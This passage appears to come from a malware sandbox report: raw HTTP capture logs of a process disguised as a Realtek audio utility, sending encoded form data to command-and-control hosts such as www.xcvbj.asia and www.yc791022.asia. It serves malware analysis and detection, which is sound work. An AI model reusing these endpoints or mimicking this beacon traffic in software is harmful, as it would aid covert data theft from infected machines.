                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.xcvbj.asia
                                                                            Origin: http://www.xcvbj.asia
                                                                            Referer: http://www.xcvbj.asia/hkgx/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 39 69 39 49 4b 4a 2f 59 69 6e 6b 70 63 38 6e 2f 76 49 70 6a 79 44 6b 74 64 45 4f 46 6c 48 4f 71 4b 4d 57 45 32 39 46 76 43 52 57 38 47 50 41 69 58 67 6c 74 4c 4a 65 56 6f 45 44 43 50 77 6d 62 6d 63 6a 63 4d 4b 45 32 6b 68 5a 45 67 68 49 44 31 77 39 66 6f 41 38 76 38 63 37 7a 59 74 6c 37 4c 69 46 69 72 48 4b 57 6e 43 56 51 46 34 57 46 51 6b 54 39 52 39 31 65 5a 45 73 4d 79 6c 55 71 51 76 67 6e 74 48 59 4f 4a 63 76 4e 54 6e 43 53 69 51 39 56 4b 4e 54 66 62 37 38 54 71 6f 64 71 35 37 37 69 6e 44 45 38 43 72 37 65 35 55 34 46 30 51 6a 73 4c 50 77 46 6c 30 36 30 76 7a 53 4a 36 63 2b 66 4f 4a 64 36 75 59 63 75 38 32 65 33 73 75 2f 70 54 4f 6f 3d
                                                                            Data Ascii: 2O=9i9IKJ/Yinkpc8n/vIpjyDktdEOFlHOqKMWE29FvCRW8GPAiXgltLJeVoEDCPwmbmcjcMKE2khZEghID1w9foA8v8c7zYtl7LiFirHKWnCVQF4WFQkT9R91eZEsMylUqQvgntHYOJcvNTnCSiQ9VKNTfb78Tqodq577inDE8Cr7e5U4F0QjsLPwFl060vzSJ6c+fOJd6uYcu82e3su/pTOo=
                                                                            Dec 3, 2024 18:56:25.509771109 CET691INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 17:56:25 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 548
                                                                            Connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            23192.168.11.2049772149.88.81.190807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:56:28.041656017 CET1289OUTPOST /hkgx/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.xcvbj.asia
                                                                            Origin: http://www.xcvbj.asia
                                                                            Referer: http://www.xcvbj.asia/hkgx/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 39 69 39 49 4b 4a 2f 59 69 6e 6b 70 63 38 6e 2f 76 49 70 6a 79 44 6b 74 64 45 4f 46 6c 48 4f 71 4b 4d 57 45 32 39 46 76 43 52 4f 38 47 34 6f 69 57 48 52 74 4b 4a 65 56 32 55 44 44 50 77 6e 4c 6d 63 37 59 4d 4b 34 49 6b 6a 68 45 68 42 55 44 69 78 39 66 69 41 38 76 31 38 37 79 63 74 6c 4c 4c 6a 31 63 72 44 57 57 6e 43 56 51 46 35 6d 46 47 46 54 39 58 39 31 64 50 55 74 44 35 46 56 39 51 76 35 61 74 48 4e 37 4a 49 62 4e 53 48 53 53 6b 69 6c 56 56 39 54 5a 63 37 38 4c 71 6f 51 30 35 37 50 41 6e 44 41 61 43 6f 4c 65 35 54 6c 4e 75 51 2f 58 66 5a 34 74 6e 78 53 78 73 31 47 70 34 2b 4b 77 47 4c 39 50 74 76 51 74 6a 46 53 59 32 4d 53 75 42 75 4d 31 58 51 64 4b 5a 67 58 44 4a 78 74 45 63 32 42 46 65 49 66 77 4f 77 61 57 57 79 33 6b 50 33 63 54 4b 43 38 66 6b 51 43 76 44 57 41 78 35 6e 66 34 43 65 38 6c 36 36 6b 59 6b 65 30 7a 6c 72 46 49 44 71 78 33 44 64 6c 4d 4e 36 2b 4c 77 32 74 42 64 67 49 38 79 57 30 61 68 32 4f 6f 6a 4f 61 76 41 41 49 76 4e 65 46 2f 46 41 35 59 6a 67 55 76 47 53 48 52 61 66 54 [TRUNCATED]
                                                                            Data Ascii: 2O=9i9IKJ/Yinkpc8n/vIpjyDktdEOFlHOqKMWE29FvCRO8G4oiWHRtKJeV2UDDPwnLmc7YMK4IkjhEhBUDix9fiA8v187yctlLLj1crDWWnCVQF5mFGFT9X91dPUtD5FV9Qv5atHN7JIbNSHSSkilVV9TZc78LqoQ057PAnDAaCoLe5TlNuQ/XfZ4tnxSxs1Gp4+KwGL9PtvQtjFSY2MSuBuM1XQdKZgXDJxtEc2BFeIfwOwaWWy3kP3cTKC8fkQCvDWAx5nf4Ce8l66kYke0zlrFIDqx3DdlMN6+Lw2tBdgI8yW0ah2OojOavAAIvNeF/FA5YjgUvGSHRafTg6v1z2qM39bUOiuKbK3KBqPudEg2c3iNSAx6m14xNeUZaIaIjWiFL9GmEbdS5JAuCRVqj/5jDlRyOeTQpWgMNVps/7uVBG91VzjeW6npKZOVC2ywRz8m1vax+MN0iYMuRDaMec9KfiJpX54nd1bP1lfxGmyG0F1PkxkG9As37QufHBJkbcSeW7syWqL8R3dOaZYiC2yWRfHR/7VZE7qi+KbePfVt+zTaQMp4iQZMVhMfAyx3i6YS5GkeGpF0Nw6BimCRMaRm+hTsermq2JgCqY0425Kk2WIil9enVic0zNTUao6WWM8paamZjEeqkJbcJVuR/Op66ReP4l7hT0jwcRVKZx4Dmonni6l0B6kKfBiRo6NjBv60HxtxgVfhX2Qm4nxB3ONeTyoNzl8n
                                                                            Dec 3, 2024 18:56:28.041711092 CET5156OUTData Raw: 4b 4b 50 30 45 48 53 47 53 50 4b 51 7a 6b 7a 50 4b 79 4d 75 49 36 42 49 64 78 71 46 2b 54 77 55 55 70 53 52 32 65 2f 69 4e 78 71 59 4e 63 2b 37 31 71 33 63 68 5a 53 76 4c 75 78 6a 34 64 6c 6f 70 2f 68 62 59 61 4c 39 52 4f 54 6d 56 5a 30 35 32 63
                                                                            Data Ascii: KKP0EHSGSPKQzkzPKyMuI6BIdxqF+TwUUpSR2e/iNxqYNc+71q3chZSvLuxj4dlop/hbYaL9ROTmVZ052c/gcYMzrizxeZiItpuAttNlCieG+zAKB9YhZOOoXohe1ZlC1W00jxMhaJDjpGELz0FZu/q/gM0ODjTX4jUsd94lvzEQYnaQ/jef4BY869yFD2lpXJlLfKM1vJdwijPhlB8r+asOa8oQMQMfP2TcwPma5QCRrJa1eK5
                                                                            Dec 3, 2024 18:56:28.041753054 CET1473OUTData Raw: 6c 5a 36 51 72 36 34 6b 38 44 32 41 72 64 43 6b 54 45 30 76 6a 46 57 79 77 34 68 4c 35 30 57 6d 74 64 46 53 41 6a 72 78 6d 35 35 55 36 50 79 4f 72 65 45 48 63 35 66 48 37 33 78 57 63 65 4f 41 75 75 4f 47 33 46 6c 64 6d 76 62 61 62 66 31 36 2b 4b
                                                                            Data Ascii: lZ6Qr64k8D2ArdCkTE0vjFWyw4hL50WmtdFSAjrxm55U6PyOreEHc5fH73xWceOAuuOG3Fldmvbabf16+KudvIINNutiaKCtdJ+FgekluTISTxx2fr27TgAQRUAuJXWJ1j09dMCsrtCkRXBFCCk6bgVSHuvLXsSdq+n5U9uY0K+zBfCQXHSbfZ1W7t8x1Z/Usj2VXGQhobq5oQ5+iROdNVH4MhZzwHtBHRV9p5pyf0dznFyDn93
                                                                            Dec 3, 2024 18:56:28.379411936 CET691INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 17:56:28 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 548
                                                                            Connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            24192.168.11.2049773149.88.81.190807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:56:30.903491020 CET484OUTGET /hkgx/?2O=wgVoJ8uM9T0/Zez11uxn+VRLTSqblAamGOKD8PxxFFLfP5o8U05sZY2pknTlSn+/tcq1eo8k+yVAgRwnrxxUqTNM4+b8NMxfCgVpsHr1kyIADa2UTEjwUtE=&ChhG6=J-xs HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.xcvbj.asia
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:56:31.244235039 CET691INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 17:56:31 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 548
                                                                            Connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            25192.168.11.2049774101.35.209.183807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:56:37.284750938 CET758OUTPOST /31pt/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.yc791022.asia
                                                                            Origin: http://www.yc791022.asia
                                                                            Referer: http://www.yc791022.asia/31pt/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 65 4f 72 4a 43 76 6d 61 42 4f 36 47 32 43 35 5a 6e 4f 54 59 6b 2b 39 77 64 42 59 48 57 50 6c 51 6d 4c 37 38 37 4e 55 30 61 74 6f 31 37 62 63 38 79 50 4e 43 74 65 54 70 4c 7a 52 49 42 56 36 41 37 72 76 78 41 51 59 37 72 58 61 55 47 4d 79 53 55 39 36 39 55 6b 38 36 6b 68 59 78 55 76 63 63 6c 64 36 73 44 45 4c 4e 37 31 69 50 64 36 76 49 39 48 6f 2b 75 6e 4c 77 58 74 66 4f 4a 36 33 4e 67 58 36 34 66 47 42 75 58 6e 6a 54 75 6e 38 50 72 66 66 35 37 33 78 5a 48 42 59 53 48 73 65 66 71 35 69 35 42 52 6a 5a 53 67 4f 54 75 6b 35 78 35 33 30 6d 63 38 2f 37 6e 51 6a 4a 6b 4e 4f 66 62 77 3d 3d
                                                                            Data Ascii: 2O=eOrJCvmaBO6G2C5ZnOTYk+9wdBYHWPlQmL787NU0ato17bc8yPNCteTpLzRIBV6A7rvxAQY7rXaUGMySU969Uk86khYxUvccld6sDELN71iPd6vI9Ho+unLwXtfOJ63NgX64fGBuXnjTun8Prff573xZHBYSHsefq5i5BRjZSgOTuk5x530mc8/7nQjJkNOfbw==
                                                                            Dec 3, 2024 18:56:37.626771927 CET427INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:56:37 GMT
                                                                            Server: Apache
                                                                            Content-Length: 263
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            26192.168.11.2049775101.35.209.183807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:56:40.160304070 CET778OUTPOST /31pt/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.yc791022.asia
                                                                            Origin: http://www.yc791022.asia
                                                                            Referer: http://www.yc791022.asia/31pt/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 65 4f 72 4a 43 76 6d 61 42 4f 36 47 73 67 74 5a 6c 76 54 59 77 75 39 2f 44 52 59 48 66 76 6c 63 6d 4c 33 38 37 4d 41 6b 61 66 63 31 2b 4f 67 38 7a 4e 6c 43 67 2b 54 70 54 44 52 4e 4d 31 36 39 37 72 7a 44 41 55 59 37 72 58 4f 55 47 4a 65 53 55 4b 75 36 55 30 38 30 72 42 59 6b 51 76 63 63 6c 64 36 73 44 46 76 6e 37 30 4b 50 64 49 37 49 38 6a 38 39 31 48 4c 78 55 74 66 4f 4e 36 33 4a 67 58 36 61 66 44 5a 49 58 69 76 54 75 6a 73 50 72 75 66 2b 78 33 78 66 59 52 5a 4e 41 4a 48 4a 6b 64 4f 47 4e 68 32 48 56 78 57 34 69 53 30 72 6b 46 41 43 66 76 6a 4a 6a 67 61 68 6d 50 50 45 47 34 61 75 45 72 6f 43 79 2f 35 2f 33 4d 6a 71 61 41 4b 74 53 4b 63 3d
                                                                            Data Ascii: 2O=eOrJCvmaBO6GsgtZlvTYwu9/DRYHfvlcmL387MAkafc1+Og8zNlCg+TpTDRNM1697rzDAUY7rXOUGJeSUKu6U080rBYkQvccld6sDFvn70KPdI7I8j891HLxUtfON63JgX6afDZIXivTujsPruf+x3xfYRZNAJHJkdOGNh2HVxW4iS0rkFACfvjJjgahmPPEG4auEroCy/5/3MjqaAKtSKc=
                                                                            Dec 3, 2024 18:56:40.509767056 CET427INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:56:40 GMT
                                                                            Server: Apache
                                                                            Content-Length: 263
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            27192.168.11.2049776101.35.209.183807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:56:43.033647060 CET2578OUTPOST /31pt/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.yc791022.asia
                                                                            Origin: http://www.yc791022.asia
                                                                            Referer: http://www.yc791022.asia/31pt/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 65 4f 72 4a 43 76 6d 61 42 4f 36 47 73 67 74 5a 6c 76 54 59 77 75 39 2f 44 52 59 48 66 76 6c 63 6d 4c 33 38 37 4d 41 6b 61 66 6b 31 2b 59 55 38 79 71 35 43 68 2b 54 70 4e 7a 52 4d 4d 31 36 73 37 72 36 4b 41 55 56 45 72 56 32 55 48 72 57 53 63 66 43 36 66 30 38 30 7a 78 59 77 55 76 63 7a 6c 64 71 77 44 46 2f 6e 37 30 4b 50 64 4a 4c 49 38 33 6f 39 33 48 4c 77 58 74 66 53 4a 36 33 78 67 58 79 77 66 44 56 2b 58 52 6e 54 75 44 38 50 34 73 33 2b 73 6e 78 64 62 52 5a 46 41 4a 43 58 6b 5a 57 73 4e 68 44 71 56 77 65 34 30 32 6f 39 6d 30 38 6f 63 65 58 4a 6b 68 2b 72 6d 5a 65 56 50 2f 43 71 53 35 6b 34 31 6f 42 32 78 76 58 6c 42 6c 47 77 4d 2f 38 65 48 56 79 74 49 75 5a 59 69 74 33 47 44 35 6d 37 38 44 48 6c 62 48 74 62 4b 62 48 74 59 34 75 43 41 32 39 73 45 49 32 61 54 62 38 4f 6f 6c 78 6e 72 43 6e 36 48 6c 46 6a 55 75 68 6c 4a 4f 62 6f 73 49 37 78 47 2b 74 71 65 38 4a 33 77 4c 68 61 73 57 73 6e 70 52 4f 2b 6f 66 4c 51 78 43 42 7a 46 4c 4f 4d 79 48 4b 7a 39 6b 33 63 33 59 54 61 63 4a 38 53 53 4f 6e [TRUNCATED]
                                                                            Data Ascii: 2O=eOrJCvmaBO6GsgtZlvTYwu9/DRYHfvlcmL387MAkafk1+YU8yq5Ch+TpNzRMM16s7r6KAUVErV2UHrWScfC6f080zxYwUvczldqwDF/n70KPdJLI83o93HLwXtfSJ63xgXywfDV+XRnTuD8P4s3+snxdbRZFAJCXkZWsNhDqVwe402o9m08oceXJkh+rmZeVP/CqS5k41oB2xvXlBlGwM/8eHVytIuZYit3GD5m78DHlbHtbKbHtY4uCA29sEI2aTb8OolxnrCn6HlFjUuhlJObosI7xG+tqe8J3wLhasWsnpRO+ofLQxCBzFLOMyHKz9k3c3YTacJ8SSOn8LVNDCj9QnVAPQCu3vKGrIloMv63OMz2j2LHy7EJdRitDHxDyU+YR/nGn+g0iPMaJsGdaLXBE5ngtrEzXBTGqk6S+l2okZyUyGdZOijBbkmWA9I60T9rkDsvCba5j2SQSfTgyq/bwQsPMum1uGoCopeE5AZecxb8MoMWVge6syIYX9gy69xXJ/FeANLtyD9ugVCOZGgzhOWzVKjMK/5scA5ipxL7qCJj/ErowVIEHbYpFKFkk0PB4R3lAIDkfg0qqaeMaWl6mdXymtxjkaYOaQaD1Cm9lzLFf/ws8lhC949uQFl55VfhyhIcwmCFnF5txNVMUbWJZ4n/HBAD1tiZkbThMhw8qlMNB6gpwnfJBocoxUz3JXWl1T+58IQkKuPvMvzojvjsxYNokF6GpYC9MqiZFud9qqV74WUTSOrcOmcNOQQOE1xYcVlcHJLtOI6a69S5pDVMA98/sPl32OK4PpthTVjsQ4AID0k8/+Z+Exm6aUxJRES+RN5fmaPxvW5Pq3pmrUxE9++I/4gMvJcD9Vgd+DEVGq7InWEQuXZdSxPFcSUlUQzSIa4wJZxkKadRuDLjfGvabPn9dHqHN2b9rqh1DHByiypOZed8yjq4qOMrO9nJw0UJEZJdkz/uRRjMusclmk2Hl9yf2GO5Od/N+lo0rdfN1/Ehye [TRUNCATED]
                                                                            Dec 3, 2024 18:56:43.033720016 CET5349OUTData Raw: 68 78 35 6c 64 76 54 6a 6a 63 39 37 6a 64 72 67 71 4e 69 2f 31 69 72 55 72 36 63 32 7a 41 77 35 38 43 37 77 4a 64 63 79 6e 6b 37 34 75 2b 6b 4b 48 2f 69 47 4a 43 69 6b 2f 53 70 56 58 71 53 31 44 4a 78 67 34 62 67 62 72 38 39 69 5a 39 58 76 63 33
                                                                            Data Ascii: hx5ldvTjjc97jdrgqNi/1irUr6c2zAw58C7wJdcynk74u+kKH/iGJCik/SpVXqS1DJxg4bgbr89iZ9Xvc3q1SJo6MTvNgsk76IauEVFKvA3MJCwg6CIDrj28tbryfEVpZBgNR27NAm4msjX7t5C6yOJ2XTuCSmPMsSV8uVeiPplI2chkwBCgQNRv0TT6FU7YJz8JTQn2/yimQhfa01/uH5Ledl7PuQbyNNEPqXOiwqUykc432zD
                                                                            Dec 3, 2024 18:56:43.382917881 CET427INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:56:43 GMT
                                                                            Server: Apache
                                                                            Content-Length: 263
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
